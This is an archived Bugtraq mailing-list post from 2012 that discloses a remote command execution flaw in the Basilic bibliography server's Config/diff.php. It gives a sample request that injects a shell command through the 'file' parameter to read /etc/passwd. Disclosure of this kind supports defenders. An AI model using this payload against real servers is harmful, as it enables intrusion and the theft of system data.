[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Basilic RCE bug

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Basilic RCE bug
From: m.razavi777@xxxxxxxxx
Date: Sat, 30 Jun 2012 20:45:21 GMT

Hi
Dear Sir

Basilic is  an Automated Bibliography Server for Research Publications 
Diffusion that use by many research center.
there is a RCE bug in basilic/Config/diff.php s could allow an attacker to run 
system command in server.
sample:
http://127.0.0.1/basilic/Config/diff.php?file=%26cat%20/etc/passwd&new=1&old=2

Regards
M.Razavi

Prev by Date: [SECURITY] [DSA 2505-1] zendframework security update
Next by Date: IBM Edge Components Caching Proxy XSS Followup
Previous by thread: [SECURITY] [DSA 2505-1] zendframework security update
Next by thread: Re: Basilic RCE bug
Index(es):
- Date
- Thread